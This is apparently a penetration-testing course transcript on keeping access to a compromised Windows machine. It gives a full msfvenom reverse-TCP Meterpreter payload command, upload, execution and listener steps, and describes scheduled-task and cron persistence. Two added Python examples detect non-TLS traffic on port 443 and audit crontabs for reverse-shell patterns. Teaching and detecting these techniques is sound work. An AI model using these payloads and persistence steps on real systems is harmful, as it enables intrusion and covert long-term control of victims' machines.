Maintaining access on the victim machine

So far, we have managed to break into the remote server by exploiting a critical vulnerability in the operating system.

Now we can continue our penetration test, but we need to stay vigilant.

In some cases you may lose your Meterpreter session (for example, if the system reboots or the network connection is unstable), which would disrupt the continuity of your audit.

That is why we need to set up persistent access on the server, by opening several Meterpreter sessions or other remote shells.

There are several strategies for this.

We will study one that consists of uploading a malicious executable file to the remote server to open a new Meterpreter session, which increases our chances of keeping our access to the machine.

We will also see other techniques to make this access persistent.

If we execute the `sessions` command on Metasploit, we can see that we currently have only one active session on the target server.

It runs on the computer named "John-PC", and we can view the associated IP address and ports.

To interact with this session, we use the command `sessions -i 1` (where 1 is the session identifier).

This gives us control back over our Meterpreter console.

This is our starting point: making sure our first session is working properly.

In another terminal, we are going to create our malicious payload using the `msfvenom` tool, which is part of the Metasploit framework and allows generating custom payloads.

Here is the complete command: `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP_Kali> LPORT=443 -f exe -o persistence.exe`.

Let's break down this command: the `-p` option specifies the payload, here a Meterpreter reverse TCP for Windows 64-bit architecture.

With a "reverse TCP" connection, it is the victim machine that initiates the network connection to the attacker's machine.

Conversely, in "bind" mode, the attacker connects directly to a port that the payload has opened on the target machine.

We almost always prefer reverse mode, because it gets through firewalls that generally block incoming connections but allow outgoing ones.

The `LHOST` parameter corresponds to the IP address of our Kali Linux attack machine.

For `LPORT`, we choose port 443.

Port 443 is used by default for HTTPS traffic.

It is almost always allowed through corporate firewalls so that users can browse the web securely.

Thus, our malicious flow will go unnoticed.
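A defender's caveat on the "goes unnoticed" point: an allowed port only hides the traffic if nothing looks inside the flow. Every TLS session begins with the client sending a ClientHello record, so a TCP flow to 443 where the client sends something else, or where the remote side speaks first, stands out to any protocol-aware sensor. The following Python is an added example (not code from the original course or from Metasploit) that applies that check to a few constructed flow records; the `Flow` class and the sample bytes are assumptions made for the example.

```python
"""Added example (not part of the original course): flag TCP flows to port 443
whose first payload is not a TLS ClientHello. The flow records below are
constructed samples, not captured traffic."""
from dataclasses import dataclass
from typing import List


@dataclass
class Flow:
    src: str
    dst: str
    dport: int
    first_speaker: str   # "client" or "server": who sent the first payload bytes
    first_bytes: bytes   # those first payload bytes (a short prefix is enough)


def is_tls_client_hello(data: bytes) -> bool:
    """True if data starts with a TLS record of type handshake (0x16), a
    3.x record version (SSL 3.0 .. TLS 1.3 use 0x0300 .. 0x0304), and a
    handshake message of type ClientHello (0x01) at offset 5."""
    return (len(data) >= 6
            and data[0] == 0x16
            and data[1] == 0x03 and data[2] <= 0x04
            and data[5] == 0x01)


def check_flow(flow: Flow) -> str:
    """Return '' for an unremarkable flow, otherwise a one-line reason."""
    if flow.dport != 443:
        return ""
    if flow.first_speaker != "client":
        return "server sent first payload on 443 (TLS clients always speak first)"
    if not is_tls_client_hello(flow.first_bytes):
        return f"client payload on 443 is not a TLS ClientHello: {flow.first_bytes[:8]!r}"
    return ""


def flag_non_tls_on_443(flows: List[Flow]) -> List[str]:
    """Run check_flow over a list of flows and collect the findings."""
    findings = []
    for f in flows:
        reason = check_flow(f)
        if reason:
            findings.append(f"{f.src} -> {f.dst}:{f.dport}: {reason}")
    return findings


# Constructed samples: a genuine-looking ClientHello prefix, a plaintext HTTP
# request sent to 443, a flow where the remote side speaks first, and a
# plain HTTP flow on port 80 that the check ignores.
SAMPLE_FLOWS = [
    Flow("10.0.0.5", "203.0.113.10", 443, "client",
         bytes.fromhex("16030100c8010000c40303")),
    Flow("10.0.0.7", "203.0.113.20", 443, "client",
         b"GET / HTTP/1.1\r\nHost: example\r\n"),
    Flow("10.0.0.9", "198.51.100.7", 443, "server",
         b"\x00\x00\x01\x00"),            # constructed non-TLS server-first bytes
    Flow("10.0.0.5", "203.0.113.10", 80, "client",
         b"GET / HTTP/1.1\r\n"),
]

if __name__ == "__main__":
    for line in flag_non_tls_on_443(SAMPLE_FLOWS):
        print(line)
```

Run against the samples, the check reports the plaintext HTTP request on 443 and the server-first flow, and ignores both the real ClientHello and the port-80 flow. In practice this logic sits behind a flow exporter or an IDS; the point is that the port number alone is not what decides whether the traffic blends in.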

The `-f` option defines the output format (here a `.exe` executable for Windows, but we can generate `.dll` formats or other types depending on the target).

Finally, the `-o` option specifies the name of the generated file, for example `persistence.exe`.

We press Enter and `msfvenom` generates the file.

Back in our control terminal, we can verify our current working directory with `pwd` (we are in `/home/kali`).

On our Meterpreter console, we can check our local folder (on our attack machine) with the `lpwd` command, to make sure we are in the same folder as our `persistence.exe` file.

To transfer this file to the victim machine, we use the command `upload persistence.exe`.

The file is uploaded.

By typing `ls` on Meterpreter, we find that the `persistence.exe` file is now present on the victim's hard drive.

Before executing it, we must configure a listener on Metasploit.

Indeed, when the target executes the file, it will attempt to connect to our Kali machine on port 443, and our system must be ready to intercept this connection.

To do this, we launch a new terminal with `msfconsole`, then select the handler module by typing `use exploit/multi/handler`.

We must configure the same payload as the one used to generate the executable by typing `set payload windows/x64/meterpreter/reverse_tcp`.

Typing `show options` displays the module's settings; we then set the listening IP address (`LHOST`) and the port (`LPORT`).

If you work on a local network or a personal lab, you will fill in the IP address of your `eth0` or `wlan0` interface.

If you use a VPN network (like TryHackMe), you will have to specify the address of your VPN interface (`tun0`).

We configure the port to 443 by typing `set LPORT 443`.

We launch the listener with the command `exploit -j` (or `run -j`) to run it in the background.

Now that our listener is ready on port 443, we return to our first Meterpreter session and launch the executable with the command `execute -f persistence.exe`.

This command creates a new process (for example under ID 2396) on the victim machine.

Almost immediately, on our listening terminal, we see a new Meterpreter session open.

If we put this session in the background with the command `background` and type `sessions`, we now see two active sessions on the target.

We thus have several access paths to our victim machine.

However, be careful not to multiply sessions unnecessarily, to avoid triggering security alerts on your client's network.

To go further in maintaining access on Windows, attackers frequently use the Task Scheduler.

The Task Scheduler lets you schedule programs or scripts to launch automatically at regular intervals or on specific events (such as system start-up).

For example, installing some browsers (such as Opera GX) creates a scheduled task that checks for updates in the background.

An attacker can create a similar task to launch their malicious executable file every 12 or 24 hours.

Thus, even if the server restarts or if the session is cut off, the scheduled task will automatically re-establish the reverse connection to the attacker's machine.

On Linux systems, the equivalent of the Windows Task Scheduler is the `cron` service (or cron daemon).

To configure scheduled tasks on Linux, we edit the user's crontab (with the command `crontab -e`) or inspect the system-wide one (with `cat /etc/crontab`).

This service schedules scripts by specifying precisely the minute, hour, day of the month, month and day of the week on which they run.

An attacker can insert a command there to run a reverse shell regularly.
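The flip side of this persistence technique is that a crontab is a plain text file any administrator can audit. The Python below is an added example (not code from the original course) that parses crontab lines, expands the minute and hour fields to estimate how often each job runs, and flags entries that a defender would want to look at: commands living in world-writable or hidden paths, commands that spawn a shell or open a network channel, and `@reboot` jobs. The sample crontab, the regexes and the function names are assumptions made for the example; the heuristics are generic and not tied to any particular tool.

```python
"""Added example (not part of the original course): audit crontab lines for
entries that commonly indicate a persistence attempt. The sample crontab is
constructed; the heuristics are generic, not Metasploit-specific."""
import re
from typing import Dict, List, Optional, Tuple

# Paths an unprivileged user can write to, or hidden dot-paths: legitimate
# cron jobs rarely live there.
WRITABLE_OR_HIDDEN = re.compile(r"(?:^|\s)(?:/tmp/|/var/tmp/|/dev/shm/|\S*/\.[^/\s]+)")
# Commands that give a cron job a network channel or a fresh interactive shell.
NET_OR_SHELL = re.compile(
    r"/dev/tcp/|\b(?:nc|ncat|socat)\b|\b(?:curl|wget)\b[^|]*\|\s*(?:ba)?sh\b|\bbash\s+-i\b")
# Human-readable frequency for the special cron nicknames.
NICKNAMES = {"@reboot": "at boot", "@hourly": "24/day", "@daily": "1/day",
             "@midnight": "1/day", "@weekly": "1 per 7 days",
             "@monthly": "~1 per 30 days", "@yearly": "1/year", "@annually": "1/year"}


def expand_field(field: str, lo: int, hi: int) -> set:
    """Expand one cron field ('*', '*/12', '1,15', '8-17/2') into the set of
    integers it matches within [lo, hi]."""
    values = set()
    for part in field.split(","):
        step = 1
        if "/" in part:
            part, step_txt = part.split("/", 1)
            step = int(step_txt)
        if part == "*":
            start, end = lo, hi
        elif "-" in part:
            a, b = part.split("-", 1)
            start, end = int(a), int(b)
        else:
            start = end = int(part)
        values.update(range(start, end + 1, step))
    return values


def parse_cron_line(line: str, system_crontab: bool = False) -> Optional[Tuple]:
    """Return (schedule, runs_per_day, command), or None for blank, comment and
    environment-assignment lines. system_crontab=True skips the extra 'user'
    column that /etc/crontab carries."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*=", line):
        return None
    parts = line.split()
    if parts[0].startswith("@"):
        n_sched = 1
        runs = NICKNAMES.get(parts[0], "?")
    else:
        n_sched = 5
        minutes = expand_field(parts[0], 0, 59)
        hours = expand_field(parts[1], 0, 23)
        runs = len(minutes) * len(hours)  # upper bound: ignores dom/mon/dow restrictions
    skip = n_sched + (1 if system_crontab else 0)
    return " ".join(parts[:n_sched]), runs, " ".join(parts[skip:])


def audit_crontab(text: str, system_crontab: bool = False) -> List[Dict]:
    """Return one finding per suspicious entry, with the reasons it was flagged."""
    findings = []
    for line in text.splitlines():
        parsed = parse_cron_line(line, system_crontab)
        if parsed is None:
            continue
        schedule, runs, command = parsed
        reasons = []
        if WRITABLE_OR_HIDDEN.search(command):
            reasons.append("command in world-writable or hidden path")
        if NET_OR_SHELL.search(command):
            reasons.append("network or shell tool in command")
        if schedule == "@reboot":
            reasons.append("runs at boot")
        if reasons:
            findings.append({"schedule": schedule, "runs_per_day": runs,
                             "command": command, "reasons": reasons})
    return findings


# Constructed sample user crontab: two ordinary jobs, a hidden job in /tmp that
# runs every 12 hours, and an @reboot job in /var/tmp.
SAMPLE_CRONTAB = """\
# constructed sample: m h dom mon dow command
SHELL=/bin/sh
0 2 * * * /usr/bin/certbot renew --quiet
*/15 * * * * /usr/local/bin/backup.sh
0 */12 * * * /tmp/.cache/update >/dev/null 2>&1
@reboot /var/tmp/svc
"""

if __name__ == "__main__":
    for finding in audit_crontab(SAMPLE_CRONTAB):
        print(finding)
```

On the sample, the two ordinary jobs pass and the last two are reported, the `/tmp/.cache/update` job with an estimated two runs per day, which is exactly the "every 12 hours" cadence described above. Feed it `crontab -l` output for each user, or `/etc/crontab` and the files under `/etc/cron.d` with `system_crontab=True`, and review anything it returns.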

These are the fundamental strategies used to ensure maintaining access on a compromised system, whether it is Windows or Linux.
